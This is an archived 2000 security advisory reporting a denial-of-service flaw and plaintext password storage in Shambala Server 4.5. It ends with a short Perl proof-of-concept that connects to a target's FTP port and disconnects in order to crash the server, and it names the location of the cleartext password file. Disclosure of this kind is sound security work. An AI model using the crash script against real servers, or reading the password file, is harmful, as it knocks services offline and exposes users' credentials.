OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Shambala 4.5 vulnerability
From: Niels Heinen (zillionSAFEMODE.ORG)
Date: Mon Oct 09 2000 - 06:20:03 CDT


  ***************************************************************************************
  * Subject: DoS in Shambala Server 4.5 *
  * Platforms: Microsoft Windows 9x, WIndows NT and Windows 2000 *
  * Risk Level High *
  * Author: zillion *
  * Vendor: Evolvable Corporation *
  * Vendor status: Notified 4 weeks ago. The problem will be fixed in a next release *
  ***************************************************************************************

  Subject:
  =========

  Shambala Server 4.5 denial of service attack.

  Overview:
  ==========
  Shambala is a low cost, multi-featured FTP and Web server distributed by
  Evolvable Corporation. It is used by numerous amateur and small office/home
  webmasters as an economical way to launch and manage a website.
  A problem with Shambala's mishandling of connections and disconnections would
  potentially enable a (simple) denial-of-service attack. A second observation
  is Shambala's storage of passwords in-the-clear on the server: a major problem
  on Windows 95 and 98 platforms.

  Product details:
  =================
  Vendor's blurb: "Shambala is an easy to use communications server
  featuring the ability to serve and access web sites, ftp sites, and
  chat rooms. Using Shambala, you can quickly create a web site and host
  it from any PC. Shambala doesn't require NT and its installation is
  non-invasive."

  Technical description:
  ======================

  Shambala does not handle all connections correctly. It is therefore
  possible to remotely crash the ftp server using a custom script which
  automates the action of opening and closing a connection to and from the
  server. The server crashes upon disconnection and gives the following error:

  Run-time error `20127`
  invalid ConnectionID

  A second problem is that Shambala stores all passwords in plain text on the server:

  c:\program files\shambala\passwords.txt (in our case)

  This is not such a big deal on an NT server as permissions could be set to deny access to this
  file. Because the server is also shipped for Windows 95 and Windows 98 it could be possible for
  any user to gain access to the file.

  Recommendations:
  ================
  It is recommended to disable the daemon until a fixed package is released.

  Vendor links:
  ==========

  http://www.evolvable.com/
  http://www.evolvable.com/estore/product.asp?sku=1

  Contact info:
  =============

  Shambala creator: awackerevolvable.com
  Bug founder:zillionsafemode.org
  http://www.safemode.org

  Greets:
  ========

  Shoutz to #hackerzlair Edgemaster, The_Wizz (pintje?), Munge, Acos, Dirk, RFP, George and all the s-mode members (what's left of it ;).

  ---cut-here---

 #!/usr/bin/perl
 #
 # This tool (tool not exploit!) crashes shambale server 4.5
 # This is a stripped version of Guido Bakkers exploit code (bedankt)
 #
 use Getopt::Std;
 use IO::Socket;
 getopts('s:', \%args);
 &usage if !defined($args{s});
 $serv = $args{s};
 $EOL="\015\012";
 $remote = IO::Socket::INET->new(
                    Proto => "tcp",
                    PeerAddr => $args{s},
                    PeerPort => "ftp(21)",
                ) || die("Unable to connect to ftp port at $args{s}\n");
 $remote->autoflush(1);
 print "Done...\n";
 exit; # remove this and the server will *NOT* crash
 sub usage {die("\n$0 -s ipaddress\n\n");}

  ---cut-here---

  ***********************************************************************************
  This advisory was created by zillion (at) safemode.org with the aim of promoting
  secure computing and to warn users of potential holes in networks and systems.
  Safemode is not responsible for any malicious, illegal or otherwise antisocial action
  taken with the information revealed in this advisory. Permission is granted for
  copying and circulating this advisory to the Internet community for the purpose
  of alerting them to problems, if and only if, the advisory is not edited or changed
  in any way, and is attributed to Safemode. (with other words: don't blame me ;)
  ***********************************************************************************